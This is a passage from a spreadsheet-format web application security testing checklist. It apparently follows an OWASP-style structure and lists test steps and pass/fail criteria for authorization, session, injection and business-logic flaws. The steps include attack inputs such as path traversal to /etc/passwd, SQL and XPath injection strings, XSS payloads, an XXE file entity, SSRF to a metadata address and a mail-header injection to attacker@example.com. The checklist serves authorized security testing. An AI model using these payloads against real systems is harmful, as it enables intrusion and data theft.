2. Manipulate the parameter with traversal payloads (../../) to attempt to access files belonging to other users or sensitive system files.</t>
  </si>
  <si>
    <t>Pass: The application prevents access to any files or data outside the user's authorized scope. 
Fail: The application returns the content of a file or data record from outside the user's permitted directory or data set.</t>
  </si>
  <si>
    <t>AUTHZ-004</t>
  </si>
  <si>
    <t>Mass Assignment</t>
  </si>
  <si>
    <t>To determine if an attacker can modify sensitive object properties by adding unexpected parameters to a request.</t>
  </si>
  <si>
    <t>Burp Suite (Autorize), Arjun</t>
  </si>
  <si>
    <t>1. Identify functions that create or update data (e.g., user profile update). 
2. Capture a valid request for that function. 
3. Add parameters for properties that should not be user-modifiable (e.g., {"role": "admin"} or {"balance": 10000}). 
4. Submit the request and check if the sensitive properties were updated.</t>
  </si>
  <si>
    <t>Pass: The application's back-end ignores any non-whitelisted parameters. 
Fail: The application modifies sensitive object properties based on the malicious parameters supplied by the user.</t>
  </si>
  <si>
    <t>AUTHZ-005</t>
  </si>
  <si>
    <t>Insecure Direct Object References (IDOR)</t>
  </si>
  <si>
    <t>To verify that the application properly checks if a user is authorized to access a requested object before returning it.</t>
  </si>
  <si>
    <t>Burp Suite (Authz, Autorize), Postman</t>
  </si>
  <si>
    <t>1. Log in as User A and access a resource using its unique ID (e.g., /invoices/123). 
2. Log in as User B. 
3. As User B, request the same URL (/invoices/123). 
4. Repeat for all functions that reference objects by ID.</t>
  </si>
  <si>
    <t>Pass: The application returns an authorization error (e.g., 403 Forbidden) when User B requests User A's resource. 
Fail: The application grants User B access to view, modify, or delete User A's data.</t>
  </si>
  <si>
    <t>AUTHZ-006</t>
  </si>
  <si>
    <t>Vertical &amp; Horizontal Privilege Escalation</t>
  </si>
  <si>
    <t>To test for both horizontal (accessing another user's data at the same level) and vertical (gaining higher-level privileges) authorization flaws.</t>
  </si>
  <si>
    <t>1. Horizontal: Log in as User A and note the ID of one of their objects. Log in as User B and try to access that object ID. 
2. Vertical: Log in as a standard user. Attempt to directly access an admin-only function URL. If that fails, replay a request from an admin session using the standard user's session token.</t>
  </si>
  <si>
    <t>Pass: Users are strictly confined to their own data (horizontal) and their assigned role's functions (vertical). 
Fail: A user can access another user's data (horizontal escalation) or perform administrative functions (vertical escalation).</t>
  </si>
  <si>
    <t>Phase 5:  Authorization Testing</t>
  </si>
  <si>
    <t>SESS-001</t>
  </si>
  <si>
    <t>Session Fixation Vulnerability</t>
  </si>
  <si>
    <t>To verify that the application generates a new session ID upon successful user authentication to prevent fixation attacks.</t>
  </si>
  <si>
    <t>1. Visit the login page and record the session ID from the cookie. 
2. Log in with valid credentials. 
3. Compare the new session ID with the one recorded before authentication.</t>
  </si>
  <si>
    <t>Pass: A new, different session ID is issued after successful login. 
Fail: The session ID remains the same before and after authentication.</t>
  </si>
  <si>
    <t>SESS-002</t>
  </si>
  <si>
    <t>Inadequate Session Timeout</t>
  </si>
  <si>
    <t>To ensure that user sessions are automatically invalidated after a defined period of inactivity.</t>
  </si>
  <si>
    <t>Burp Suite, Manual Browser Testing</t>
  </si>
  <si>
    <t>1. Log in and capture a valid request to a protected resource. 
2. Wait for the application's defined inactivity timeout period to pass. 
3. Replay the captured request.</t>
  </si>
  <si>
    <t>Pass: The replayed request is rejected, and the user is prompted to re-authenticate. 
Fail: The session remains active, and the replayed request is processed successfully.</t>
  </si>
  <si>
    <t>SESS-003</t>
  </si>
  <si>
    <t>Improper Session Termination</t>
  </si>
  <si>
    <t>To confirm that the logout function properly invalidates the session on the server side.</t>
  </si>
  <si>
    <t>1. Log in and copy the session cookie's value. 
2. Use the application's logout feature. 
3. Attempt to access a protected page by re-injecting the copied session cookie into the browser.</t>
  </si>
  <si>
    <t>Pass: The server rejects the request made with the old session cookie. 
Fail: The old session cookie is still valid and grants access to protected pages after logout.</t>
  </si>
  <si>
    <t>SESS-004</t>
  </si>
  <si>
    <t>Session Hijacking</t>
  </si>
  <si>
    <t>To determine if session tokens are transmitted insecurely, making them vulnerable to interception.</t>
  </si>
  <si>
    <t>Wireshark, Burp Suite, OWASP ZAP</t>
  </si>
  <si>
    <t>1. Monitor network traffic while logging in and using the application. 
2. Check if the session token is ever transmitted over an unencrypted HTTP connection. 
3. Test for XSS flaws that could be used to steal the cookie.</t>
  </si>
  <si>
    <t>Pass: The session token is only ever transmitted over HTTPS, and the Secure flag is set on the cookie. 
Fail: The session token is transmitted over HTTP, making it vulnerable to network sniffing.</t>
  </si>
  <si>
    <t>SESS-005</t>
  </si>
  <si>
    <t>Insecure Cookie Configuration</t>
  </si>
  <si>
    <t>To ensure session cookies are configured with appropriate security flags and a restrictive scope.</t>
  </si>
  <si>
    <t>1. Log in and inspect the session cookie. 
2. Verify that the Secure flag is set. 
3. Verify that the HttpOnly flag is set. 
4. Check that the Domain and Path attributes are not overly permissive.</t>
  </si>
  <si>
    <t>Pass: The Secure and HttpOnly flags are set, and the Domain/Path is scoped correctly. 
Fail: Either the Secure or HttpOnly flag is missing, or the scope is too broad.</t>
  </si>
  <si>
    <t>SESS-006</t>
  </si>
  <si>
    <t>JWT Security Testing</t>
  </si>
  <si>
    <t>To identify common implementation flaws in JSON Web Tokens (JWTs), such as weak secrets or algorithm confusion.</t>
  </si>
  <si>
    <t>jwt_tool, Burp Suite (JSON Web Tokens extension)</t>
  </si>
  <si>
    <t>1. Decode the JWT and check for sensitive data in the payload. 
2. Attempt to change the algorithm in the header to none and resubmit. 
3. Attempt to change RS256 to HS256 and sign the token with the public key. 
4. Check if the signature is being validated by the server.</t>
  </si>
  <si>
    <t>Pass: The server validates the signature, rejects tokens with a modified or none algorithm, and does not leak sensitive data. 
Fail: The server accepts a token with no signature, a modified algorithm, or an invalid signature.</t>
  </si>
  <si>
    <t>SESS-007</t>
  </si>
  <si>
    <t>Session Token Predictability</t>
  </si>
  <si>
    <t>To verify that session tokens are generated with sufficient randomness to be unpredictable.</t>
  </si>
  <si>
    <t>1. Request a large number of new session tokens from the application. 
2. Load the collected tokens into a statistical analysis tool. 
3. Analyze the results for character distribution, randomness, and overall entropy.</t>
  </si>
  <si>
    <t>Pass: The tokens are shown to have a high level of entropy and are statistically random. 
Fail: The tokens exhibit a discernible pattern or have low entropy, making them predictable.</t>
  </si>
  <si>
    <t>SESS-008</t>
  </si>
  <si>
    <t>Token Replay Attack</t>
  </si>
  <si>
    <t>To ensure that single-use tokens (e.g., anti-CSRF tokens, password reset tokens) cannot be reused.</t>
  </si>
  <si>
    <t>Burp Suite Repeater</t>
  </si>
  <si>
    <t>1. Capture a request that contains a single-use token (e.g., a form submission). 
2. Send the request and confirm it was processed successfully. 
3. Resend the exact same request a second time.</t>
  </si>
  <si>
    <t>Pass: The server rejects the second request with an error indicating the token has already been used. 
Fail: The server accepts the replayed request and processes the transaction a second time.</t>
  </si>
  <si>
    <t>Phase 6: Session Management Testing</t>
  </si>
  <si>
    <t>INJ-001</t>
  </si>
  <si>
    <t>Reflected Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>To determine if the application reflects user-supplied input in an HTTP response without proper encoding, allowing script execution.</t>
  </si>
  <si>
    <t>Burp Suite, OWASP ZAP, Browser Dev Tools</t>
  </si>
  <si>
    <t>1. Identify all input vectors (URL parameters, form fields). 
2. Inject a simple HTML payload (e.g., &lt;b&gt;test&lt;/b&gt;) to check for reflection. 
3. Inject a basic script payload (e.g., &lt;script&gt;alert(1)&lt;/script&gt;) and test filter bypasses.</t>
  </si>
  <si>
    <t>Pass: All user input is properly encoded (e.g., &lt; becomes &amp;lt;) and no scripts are executed. 
Fail: A script payload executes in the victim's browser.</t>
  </si>
  <si>
    <t>INJ-002</t>
  </si>
  <si>
    <t>Stored Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>To verify if the application stores and later displays user-supplied input without proper sanitization, leading to script execution for all users.</t>
  </si>
  <si>
    <t>Burp Suite, Acunetix, Browser</t>
  </si>
  <si>
    <t>1. Identify input fields that store data (e.g., comments, profiles). 
2. Submit a script payload into these fields. 
3. Browse to the page where the data is displayed to check if the script executes.</t>
  </si>
  <si>
    <t>Pass: All user input is sanitized before storage or encoded before display, preventing script execution. 
Fail: The injected script executes when the stored data is viewed by any user.</t>
  </si>
  <si>
    <t>INJ-003</t>
  </si>
  <si>
    <t>Blind Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>To test if an XSS payload injected into one part of an application executes in a completely different back-end application (e.g., an admin panel).</t>
  </si>
  <si>
    <t>XSS Hunter, bXSS, Burp Suite Collaborator</t>
  </si>
  <si>
    <t>1. Inject a blind XSS payload (which calls back to an external server) into every possible input field. 
2. Wait for a callback to the specified external server. 
3. If a callback occurs, analyze the provided data to identify the vulnerable page.</t>
  </si>
  <si>
    <t>Pass: No callbacks are received from any injected payloads. 
Fail: A callback is received, indicating the payload was executed by a back-end system.</t>
  </si>
  <si>
    <t>INJ-004</t>
  </si>
  <si>
    <t>SQL Injection (SQLi)</t>
  </si>
  <si>
    <t>To determine if user-supplied input can manipulate SQL queries to access or modify database information without authorization.</t>
  </si>
  <si>
    <t>sqlmap, Burp Suite, jSQL Injection</t>
  </si>
  <si>
    <t>1. Identify all input parameters that could be used in a SQL query. 
2. Inject characters like a single quote (') to check for SQL errors. 
3. Use time-based (' AND SLEEP(5) --) or boolean-based payloads to confirm the vulnerability.</t>
  </si>
  <si>
    <t>Pass: The application handles all input safely using parameterized queries, and no SQL errors or unexpected behaviors occur. 
Fail: An injected payload causes a database error, alters a query's logic, or extracts data.</t>
  </si>
  <si>
    <t>INJ-005</t>
  </si>
  <si>
    <t>OS Command Injection</t>
  </si>
  <si>
    <t>To check if the application passes user-supplied input to a system shell command without sanitization, allowing arbitrary OS command execution.</t>
  </si>
  <si>
    <t>commix, Burp Suite</t>
  </si>
  <si>
    <t>Pass: The application properly sanitizes or rejects all shell metacharacters. 
Fail: The application executes the injected OS command, confirmed by direct output or time-based evidence.</t>
  </si>
  <si>
    <t>INJ-006</t>
  </si>
  <si>
    <t>Server-Side Code Injection</t>
  </si>
  <si>
    <t>To determine if user input is evaluated and executed as server-side code by the application (e.g., via PHP's eval() function).</t>
  </si>
  <si>
    <t>1. Identify inputs that might be passed to an evaluation function. 
2. Inject simple language-specific arithmetic operations (e.g., 7*7). 
3. If the output is 49, attempt to inject code that would call a system function (e.g., phpinfo()).</t>
  </si>
  <si>
    <t>Pass: The application treats all input as literal data and does not execute it as code. 
Fail: The application's response shows the result of the executed code.</t>
  </si>
  <si>
    <t>INJ-007</t>
  </si>
  <si>
    <t>Path Traversal</t>
  </si>
  <si>
    <t>To test if the application allows access to files and directories stored outside the intended web root directory.</t>
  </si>
  <si>
    <t>dotdotpwn, Burp Suite, ffuf</t>
  </si>
  <si>
    <t>1. Identify parameters that take a filename as input. 
2. Replace the filename with traversal sequences (../). 
3. Attempt to access known system files (e.g., ../../../../etc/passwd). 
4. Test encoding bypasses (%2e%2e%2f).</t>
  </si>
  <si>
    <t>Pass: The application prevents access to any files outside the intended directory. 
Fail: The contents of a sensitive system file are returned in the response.</t>
  </si>
  <si>
    <t>INJ-008</t>
  </si>
  <si>
    <t>LDAP Injection</t>
  </si>
  <si>
    <t>To determine if user input can manipulate LDAP queries to bypass authentication or access unauthorized information from a directory service.</t>
  </si>
  <si>
    <t>Softerra LDAP Browser, Burp Suite</t>
  </si>
  <si>
    <t>Pass: The application correctly escapes all LDAP metacharacters in user input. 
Fail: An injected payload alters the LDAP query's logic, leading to an information leak or authentication bypass.</t>
  </si>
  <si>
    <t>INJ-009</t>
  </si>
  <si>
    <t>Server-Side Includes (SSI) Injection</t>
  </si>
  <si>
    <t>To check if the application processes user-supplied input as SSI directives, allowing file inclusion or command execution on the server.</t>
  </si>
  <si>
    <t>1. Find input fields that are reflected on the page. 
2. Inject common SSI directives (e.g., or). 
3. Check if the output on the page includes the result of the directive.</t>
  </si>
  <si>
    <t>Pass: The application does not interpret SSI directives in user input and displays them as text. 
Fail: The response contains the output of the executed SSI directive.</t>
  </si>
  <si>
    <t>INJ-010</t>
  </si>
  <si>
    <t>Buffer Overflow</t>
  </si>
  <si>
    <t>To test if the application correctly handles large inputs or if it can be crashed or forced to execute arbitrary code.</t>
  </si>
  <si>
    <t>Immunity Debugger, gdb, Fuzzers</t>
  </si>
  <si>
    <t>1. Identify input fields with potentially fixed-length buffers. 
2. Submit increasingly large strings of data (e.g., "A"x1000). 
3. Monitor the application for crashes, hangs, or unexpected errors.</t>
  </si>
  <si>
    <t>Pass: The application gracefully handles large inputs by truncating them or returning a clear error. 
Fail: The application crashes or exhibits undefined behavior, indicating a potential overflow.</t>
  </si>
  <si>
    <t>INJ-011</t>
  </si>
  <si>
    <t>XML External Entity (XXE) Injection</t>
  </si>
  <si>
    <t>To verify that the application's XML parser is configured to block external entities, preventing local file disclosure or SSRF.</t>
  </si>
  <si>
    <t>1. Identify any endpoints that parse XML input. 
2. Modify the XML to include a DOCTYPE declaration defining an external entity pointing to a local file (e.g., file:///etc/passwd). 
3. Check if the response contains the file's contents.</t>
  </si>
  <si>
    <t>Pass: The XML parser rejects the DTD or does not resolve the external entity. 
Fail: The application response includes the content of the requested external file.</t>
  </si>
  <si>
    <t>INJ-012</t>
  </si>
  <si>
    <t>Server-Side Template Injection (SSTI)</t>
  </si>
  <si>
    <t>To determine if user input is being embedded insecurely into a server-side template, allowing arbitrary code execution.</t>
  </si>
  <si>
    <t>Tplmap, Burp Suite</t>
  </si>
  <si>
    <t>1. Identify input fields that are reflected in the response. 
2. Inject template syntax polyglots like ${7*7}, {{7*7}}. 
3. If the server responds with 49, identify the engine and craft a payload for command execution.</t>
  </si>
  <si>
    <t>Pass: The application treats all template syntax as literal strings. 
Fail: The server executes the template expression and returns the result, indicating a vulnerability.</t>
  </si>
  <si>
    <t>INJ-013</t>
  </si>
  <si>
    <t>Insecure Deserialization</t>
  </si>
  <si>
    <t>To find if the application deserializes untrusted user data, potentially leading to remote code execution (RCE).</t>
  </si>
  <si>
    <t>ysoserial, Burp Suite (Java Deserialization Scanner)</t>
  </si>
  <si>
    <t>1. Identify serialized objects in HTTP requests (e.g., cookies, parameters). 
2. Use a tool to generate a malicious serialized object that executes a command (a "gadget chain"). 
3. Replace the legitimate object with the malicious one and send the request.</t>
  </si>
  <si>
    <t>Pass: The application rejects malformed serialized objects or does not deserialize untrusted data. 
Fail: The application deserializes the malicious object, leading to RCE or another adverse effect.</t>
  </si>
  <si>
    <t>INJ-014</t>
  </si>
  <si>
    <t>Server-Side Request Forgery (SSRF)</t>
  </si>
  <si>
    <t>To test if an attacker can coerce the application to make HTTP requests to an arbitrary domain of their choosing, including internal network services.</t>
  </si>
  <si>
    <t>Burp Suite Collaborator, SSRFmap</t>
  </si>
  <si>
    <t>1. Find functions where the app fetches a remote resource. 
2. Replace the URL with a server you control (e.g., Burp Collaborator) to confirm outbound requests. 
3. Attempt to access internal IP addresses (e.g., 127.0.0.1, 169.254.169.254).</t>
  </si>
  <si>
    <t>Pass: The application validates user-supplied URLs against a strict allow-list and blocks internal requests. 
Fail: The application makes a request to an attacker-controlled server or an internal service.</t>
  </si>
  <si>
    <t>INJ-015</t>
  </si>
  <si>
    <t>XPath Injection</t>
  </si>
  <si>
    <t>To determine if user input can manipulate XPath queries to access or reveal the structure of XML documents when the app uses XPath for queries.</t>
  </si>
  <si>
    <t>OWASP WebScarab, Burp Suite</t>
  </si>
  <si>
    <t>1. Identify inputs used in XPath queries. 
2. Inject a single quote (') to check for errors. 
3. Use payloads like ' or '1'='1 to try and bypass logic and dump XML nodes.</t>
  </si>
  <si>
    <t>Pass: The application safely handles input, preventing manipulation of XPath queries. 
Fail: The injected payload alters the query logic, leading to an information leak.</t>
  </si>
  <si>
    <t>INJ-016</t>
  </si>
  <si>
    <t>HTTP Request Smuggling</t>
  </si>
  <si>
    <t>To test for inconsistencies in how front-end (proxy) and back-end servers process ambiguous HTTP requests, allowing request desynchronization.</t>
  </si>
  <si>
    <t>1. Use an automated tool to send CL.TE, TE.CL, and TE.TE payloads. 
2. These payloads attempt to cause a time delay or a differential response from the back-end. 
3. Manually craft payloads to confirm and exploit the desynchronization.</t>
  </si>
  <si>
    <t>Pass: The server chain consistently processes requests and rejects ambiguous ones. 
Fail: The front-end and back-end servers interpret request boundaries differently, allowing smuggling.</t>
  </si>
  <si>
    <t>INJ-017</t>
  </si>
  <si>
    <t>HTTP Response Splitting</t>
  </si>
  <si>
    <t>To check if user input is reflected in response headers, allowing an attacker to inject additional headers and split the response into two.</t>
  </si>
  <si>
    <t>Burp Suite, Netcat</t>
  </si>
  <si>
    <t>1. Identify any user input reflected in a response header (e.g., in a redirect URL). 
2. Inject URL-encoded CRLF characters (%0d%0a) followed by a custom header. 
3. Check if the injected header appears in the final response.</t>
  </si>
  <si>
    <t>Pass: The application sanitizes or rejects CRLF characters from user input intended for headers. 
Fail: The application reflects the CRLF characters, allowing the response to be split.</t>
  </si>
  <si>
    <t>INJ-018</t>
  </si>
  <si>
    <t>Host Header Injection</t>
  </si>
  <si>
    <t>To determine if the application trusts the HTTP Host header to generate URLs, potentially leading to password reset poisoning or web cache poisoning.</t>
  </si>
  <si>
    <t>1. Identify functionality that generates absolute URLs (e.g., password resets). 
2. Intercept the request and change the Host header to an attacker-controlled domain. 
3. Check if the generated link (e.g., in the email) points to the malicious domain.</t>
  </si>
  <si>
    <t>Pass: The application uses a server-side configured hostname for generating links and ignores the Host header. 
Fail: The application uses the manipulated Host header to generate a critical URL.</t>
  </si>
  <si>
    <t>INJ-019</t>
  </si>
  <si>
    <t>HTTP Verb Tampering</t>
  </si>
  <si>
    <t>To test if an application's access controls can be bypassed by changing the HTTP method (verb) of a request (e.g., from GET to POST).</t>
  </si>
  <si>
    <t>Burp Suite Repeater, cURL</t>
  </si>
  <si>
    <t>1. Identify a page with access controls enforced for a specific verb. 
2. Attempt to access the same URL using a different verb like GET, POST, PUT, etc. 
3. Observe if the server grants access where it should not.</t>
  </si>
  <si>
    <t>Pass: The access control logic is applied consistently regardless of the HTTP verb used. 
Fail: Changing the HTTP verb bypasses the security check and grants unauthorized access.</t>
  </si>
  <si>
    <t>INJ-020</t>
  </si>
  <si>
    <t>HTTP Parameter Pollution (HPP)</t>
  </si>
  <si>
    <t>To determine how the application handles multiple occurrences of the same parameter and if this behavior can be exploited to bypass security controls.</t>
  </si>
  <si>
    <t>1. Identify a request with key parameters. 
2. Duplicate a parameter in the request (e.g., ?user=A&amp;user=B). 
3. Observe which value the server processes (the first, the last, or both). 
4. Test if this behavior can be used to bypass validation or modify application logic.</t>
  </si>
  <si>
    <t>Pass: The application has a predictable and safe way of handling duplicate parameters. 
Fail: The application's handling of duplicate parameters leads to a security bypass.</t>
  </si>
  <si>
    <t>INJ-021</t>
  </si>
  <si>
    <t>To test if user input can manipulate commands sent to a back-end mail server, leading to unauthorized actions like blind-copying emails.</t>
  </si>
  <si>
    <t>1. Identify functions that interact with a mail server (e.g., contact forms). 
2. Inject CRLF characters (\r\n) followed by SMTP commands (e.g., BCC: attacker@example.com). 
3. Check if the injected command was executed.</t>
  </si>
  <si>
    <t>Pass: The application properly sanitizes user input to prevent the injection of mail server commands. 
Fail: The injected command is executed by the mail server.</t>
  </si>
  <si>
    <t>Phase 7: Input Validation Testing</t>
  </si>
  <si>
    <t>1. Identify input fields that may interact with the OS (e.g., filename parameters). 
2. Inject shell metacharacters (e.g., ;, `, &amp;&amp;) followed by a simple command like whoamior a time-delay command likeping`.</t>
  </si>
  <si>
    <t>1. Identify login forms or search fields that interact with an LDAP directory. 
2. Inject LDAP metacharacters like *, (, ), &amp;, `. &lt;br&gt; 3. Attempt to use wildcard payloads (e.g., user=*`) to bypass authentication or enumerate users.</t>
  </si>
  <si>
    <t>Phase 8: Error Handling</t>
  </si>
  <si>
    <t>BIZ-001</t>
  </si>
  <si>
    <t>Business Logic Data Validation</t>
  </si>
  <si>
    <t>To verify that the application enforces logical constraints on data beyond simple type validation.</t>
  </si>
  <si>
    <t>1. Map key business processes and their data inputs. 
2. Submit data that is syntactically valid but logically flawed (e.g., quantity=-1, scheduling an event in the past). 
3. Check if the server-side logic rejects the invalid data.</t>
  </si>
  <si>
    <t>Pass: The application's back-end correctly rejects data that violates business rules. 
Fail: The application accepts and processes data that is logically inconsistent with the business function.</t>
  </si>
  <si>
    <t>BIZ-002</t>
  </si>
  <si>
    <t>Application Workflow Bypass</t>
  </si>
  <si>
    <t>To ensure that a user cannot skip or repeat steps in a defined business process to achieve a malicious outcome.</t>
  </si>
  <si>
    <t>1. Map out a critical multi-step workflow (e.g., add to cart -&gt; enter shipping -&gt; make payment). 
2. Attempt to directly browse to the URL of a later step without completing prior steps. 
3. Attempt to replay an earlier step's request after the workflow is complete.</t>
  </si>
  <si>
    <t>Pass: The application state machine correctly enforces the intended sequence of events. 
Fail: A user can skip a required step (like payment) or replay a step (like adding a free item) to abuse the workflow.</t>
  </si>
  <si>
    <t>BIZ-003</t>
  </si>
  <si>
    <t>Timing or Sequence Flaws</t>
  </si>
  <si>
    <t>To identify vulnerabilities where the order or timing of events can be manipulated to create an unintended, insecure state.</t>
  </si>
  <si>
    <t>1. Identify a process where sequence is critical (e.g., applying a coupon before confirming an order). 
2. Manipulate the order of HTTP requests sent to the server. 
3. Check if performing actions out of the intended order leads to an exploitable state.</t>
  </si>
  <si>
    <t>Pass: The application correctly manages its state and validates the sequence of operations on the server side. 
Fail: Manipulating the sequence of requests leads to a security flaw, such as applying a discount multiple times.</t>
  </si>
  <si>
    <t>BIZ-004</t>
  </si>
  <si>
    <t>Business Logic Abuse</t>
  </si>
  <si>
    <t>To test if a legitimate application feature can be used for a malicious purpose not anticipated by the developers.</t>
  </si>
  <si>
    <t>Manual Logic Testing, Burp Suite Intruder</t>
  </si>
  <si>
    <t>1. Understand the intended purpose of a feature (e.g., a product review form). 
2. Hypothesize an unintended, abusive use (e.g., spamming the form with ads). 
3. Test the hypothesis at scale using automation tools.</t>
  </si>
  <si>
    <t>Pass: Features have safeguards (like rate limiting, CAPTCHA) to prevent abuse. 
Fail: A legitimate feature can be used to spam users, deplete inventory, or cause other harm.</t>
  </si>
  <si>
    <t>BIZ-005</t>
  </si>
  <si>
    <t>Price Manipulation Tampering</t>
  </si>
  <si>
    <t>To verify that the price or quantity of an item in an e-commerce application cannot be manipulated on the client side.</t>
  </si>
  <si>
    <t>1. Add an item to the shopping cart and proceed to the checkout/payment step. 
2. Intercept the final request before submission. 
3. Modify parameters related to price or quantity to a lower value. 
4. Check if the transaction is processed with the tampered value.</t>
  </si>
  <si>
    <t>Pass: The server re-validates the price and quantity against a trusted back-end data source before processing the payment. 
Fail: The transaction is completed at the manipulated, lower price.</t>
  </si>
  <si>
    <t>BIZ-006</t>
  </si>
  <si>
    <t>Logic-Based Denial of Service</t>
  </si>
  <si>
    <t>To identify functions that are computationally expensive and can be repeatedly invoked by an attacker to exhaust server resources.</t>
  </si>
  <si>
    <t>Apache JMeter, Burp Suite Intruder</t>
  </si>
  <si>
    <t>1. Identify a resource-intensive function (e.g., complex search, report generation, file conversion). 
2. Use an automated tool to send many valid requests to this function. 
3. Monitor server performance (CPU, memory) and application response times.</t>
  </si>
  <si>
    <t>Pass: The application remains responsive and stable under load, likely through rate limiting or caching. 
Fail: Repeatedly invoking the function causes the application to become slow or unresponsive for other users.</t>
  </si>
  <si>
    <t>SEC-001</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>To ensure that sensitive, state-changing actions are protected by an anti-CSRF token, preventing them from being executed by a forged request.</t>
  </si>
  <si>
    <t>Burp Suite (CSRF PoC Generator), OWASP ZAP</t>
  </si>
  <si>
    <t>1. Identify a sensitive request (e.g., change password, delete account). 
2. Check for the presence of a unique, unpredictable anti-CSRF token in the request. 
3. Attempt to perform the action by removing or modifying the token.</t>
  </si>
  <si>
    <t>Pass: The request is rejected by the server if a valid, session-tied anti-CSRF token is not present. 
Fail: The sensitive action is successfully executed without a valid anti-CSRF token.</t>
  </si>
  <si>
    <t>SEC-002</t>
  </si>
  <si>
    <t>Data Integrity Checks</t>
  </si>
  <si>
    <t>To verify that the server re-validates all client-submitted data to prevent tampering with values that should be server-controlled.</t>
  </si>
  <si>
    <t>1. Identify data sent from the server to the client that is later submitted back (e.g., item price in a hidden form field). 
2. Intercept the request and modify this data before it is sent to the server. 
3. Check if the server detects the modification or blindly trusts the tampered data.</t>
  </si>
  <si>
    <t>Pass: The server ignores the client-submitted value and re-validates it against a trusted data source. 
Fail: The server processes the tampered client-side data, leading to a security flaw.</t>
  </si>
  <si>
    <t>BIZ-007</t>
  </si>
  <si>
    <t>Race Conditions (Process Timing)</t>
  </si>
  <si>
    <t>To identify flaws where an attacker can perform two or more actions almost simultaneously to bypass a check-then-act logic.</t>
  </si>
  <si>
    <t>Burp Suite (Turbo Intruder), Race The Web</t>
  </si>
  <si>
    <t>1. Identify a process with separate "check" and "act" stages (e.g., check balance, then withdraw; redeem coupon). 
2. Craft the request for the "act" stage. 
3. Send a large number of these requests concurrently to the server. 
4. Check if the action was performed more times than the initial check should have allowed.</t>
  </si>
  <si>
    <t>Pass: The application uses locking or other mechanisms to ensure the check-and-act process is atomic. 
Fail: Multiple "act" requests are processed before the state is updated, bypassing the initial "check."</t>
  </si>
  <si>
    <t>SEC-003</t>
  </si>
  <si>
    <t>Unrestricted File Upload</t>
  </si>
  <si>
    <t>To ensure the file upload functionality cannot be abused to upload and execute malicious files, leading to Remote Code Execution (RCE).</t>
  </si>
  <si>
    <t>Burp Suite, Fuxploider</t>
  </si>
  <si>
    <t>1. Identify a file upload feature. 
2. Attempt to upload a file with a server-side script extension (e.g., .php, .aspx). 
3. If blocked, try bypasses like changing the Content-Type header or using null-byte injections. 
4. Attempt to access the uploaded file to confirm code execution.</t>
  </si>
  <si>
    <t>Pass: The application validates files by their actual content, renames them, and stores them in a non-executable location. 
Fail: An executable file can be uploaded and accessed via a URL, leading to RCE.</t>
  </si>
  <si>
    <t>BIZ-008</t>
  </si>
  <si>
    <t>Lack of Anti-Automation</t>
  </si>
  <si>
    <t>To verify that sensitive or abuse-prone application functions are protected against automated, high-volume attacks.</t>
  </si>
  <si>
    <t>Burp Suite Intruder</t>
  </si>
  <si>
    <t>1. Identify a key function (e.g., login, voting, registration, password reset). 
2. Use an automated tool to send hundreds of requests to this function in a short time. 
3. Check if the application implements defenses like rate limiting (e.g., 429 Too Many Requests), CAPTCHAs, or temporary IP/account blocks.</t>
  </si>
  <si>
    <t>Pass: The application detects and effectively blocks or throttles automated requests after a low threshold. 
Fail: The application allows an unlimited number of requests, enabling brute-force or other automated attacks.</t>
  </si>
  <si>
    <t>Phase 9: Business Logic Testing</t>
  </si>
  <si>
    <t>CS-001</t>
  </si>
  <si>
    <t>DOM-Based XSS</t>
  </si>
  <si>
    <t>To determine if client-side JavaScript writes user-supplied data to the DOM insecurely, leading to script execution.</t>
  </si>
  <si>
    <t>Browser Dev Tools, Burp Suite (DOM Invader)</t>
  </si>
  <si>
    <t>1. Identify sources of user input that JavaScript can access (e.g., location.hash). 
2. Find sinks where this data is written to the DOM (e.g., innerHTML). 
3. Craft a payload in the source (e.g., #&lt;img src=x onerror=alert(1)&gt;) that executes when written by the sink.</t>
  </si>
  <si>
    <t>Pass: The application sanitizes all data before writing it to a DOM sink, preventing script execution. 
Fail: A crafted input executes JavaScript within the user's browser.</t>
  </si>
  <si>
    <t>CS-002</t>
  </si>
  <si>
    <t>Cross-Site Script Inclusion (XSSI)</t>
  </si>
  <si>
    <t>To determine if sensitive data is exposed via a JavaScript endpoint that can be included and read by an attacker's malicious website.</t>
  </si>
  <si>
    <t>1. Identify dynamic JS files or JSONP endpoints that return sensitive user data. 
2. Create a PoC page that includes the target URL in a &lt;script&gt; tag. 
3. Use JavaScript on the PoC page to access variables or override functions to capture the sensitive data.</t>
  </si>
  <si>
    <t>Pass: Sensitive data is not returned in executable JS files, or endpoints are protected by non-cookie-based authentication. 
Fail: An attacker's page can include the script and exfiltrate sensitive data.</t>
  </si>
  <si>
    <t>CS-003</t>
  </si>
  <si>
    <t>XSS Filter Evasion</t>
  </si>
  <si>
    <t>To test the effectiveness of XSS filters by using obfuscated or non-standard payloads to bypass them.</t>
  </si>
  <si>
    <t>Burp Suite Intruder, XSS Cheat Sheets</t>
  </si>
  <si>
    <t>1. Identify a reflected input with an active XSS filter. 
2. Confirm a standard payload (&lt;script&gt;alert(1)&lt;/script&gt;) is blocked. 
3. Use various evasion techniques, such as different event handlers (&lt;svg onload=alert(1)&gt;), character encoding, or malformed HTML, to bypass the filter.</t>
  </si>
  <si>
    <t>Pass: The filter correctly blocks both standard and obfuscated XSS payloads. 
Fail: An obfuscated or non-standard payload bypasses the filter and executes.</t>
  </si>
  <si>
    <t>CS-004</t>
  </si>
  <si>
    <t>Client-Side Open Redirection</t>
  </si>
  <si>
    <t>To verify that client-side code does not redirect users to arbitrary, untrusted URLs based on user-supplied input.</t>
  </si>
  <si>
    <t>1. Identify JavaScript code that performs redirection (e.g., window.location.href = param). 
2. Manipulate the parameter to point to an external malicious domain. 
3. Check if the application performs the redirect without proper validation of the URL.</t>
  </si>
  <si>
    <t>Pass: The application validates any URL from user input against a strict allow-list before redirecting. 
Fail: The application redirects the user to an arbitrary external website.</t>
  </si>
  <si>
    <t>CS-005</t>
  </si>
  <si>
    <t>HTML5 Storage Security</t>
  </si>
  <si>
    <t>To ensure that no sensitive information (e.g., session tokens, PII) is stored in localStorage or sessionStorage.</t>
  </si>
  <si>
    <t>1. Log in and use the application. 
2. Open the browser's developer tools. 
3. Inspect the contents of localStorage and sessionStorage in the "Application" or "Storage" tab. 
4. Look for credentials, session tokens, or API keys.</t>
  </si>
  <si>
    <t>Pass: Client-side storage is only used for non-sensitive data. 
